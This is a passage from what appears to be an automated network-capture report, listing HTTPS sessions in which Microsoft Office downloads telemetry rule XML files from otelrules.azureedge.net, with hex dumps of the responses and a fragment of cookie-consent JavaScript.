                                                                                                                                                                                              Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                              2024-11-24 12:39:51 UTC16383INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                                                                                                                              Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                                                                                                                              2024-11-24 12:39:51 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                              Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                              2024-11-24 12:39:51 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                                              Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              98192.168.2.64982913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:51 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:51 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2284
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                              x-ms-request-id: 1a818a33-b01e-005c-4475-3b4c66000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123951Z-174c587ffdfldtt2hC1TEBwv9c00000004b00000000040x3
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:51 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              99192.168.2.64983213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:51 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:51 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                              x-ms-request-id: 42455f54-301e-0051-494c-3c38bb000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123951Z-15b8b599d88tr2flhC1TEB5gk400000004fg00000000dphd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:51 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              100192.168.2.64983113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:51 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:51 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                              x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123951Z-178bfbc474bgvl54hC1NYCsfuw000000060g000000003k9x
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:51 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              101192.168.2.64983013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:51 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:51 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1250
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                              x-ms-request-id: ab1d776c-201e-0085-601b-3d34e3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123951Z-15b8b599d88tr2flhC1TEB5gk400000004kg0000000073u5
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:51 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              102192.168.2.64983313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:52 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:52 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                              x-ms-request-id: dd6cf878-401e-0067-68b9-3b09c2000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123952Z-15b8b599d88tmlzshC1TEB4xpn00000004eg000000000erb
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:52 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              103192.168.2.64983813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:53 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:53 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                              x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123953Z-178bfbc474bv587zhC1NYCny5w00000005ug0000000089b5
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:53 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              104192.168.2.64983913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:53 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:53 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                              x-ms-request-id: aa1ebe18-101e-0017-5340-3c47c7000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123953Z-15b8b599d88hd9g7hC1TEBp75c00000004f0000000004ry4
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              105192.168.2.64984013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:53 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:53 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE6431446"
                                                                                                                                                                                              x-ms-request-id: 161730be-201e-0051-3520-3d7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123953Z-178bfbc474b9xljthC1NYCtw9400000005s000000000dbvr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


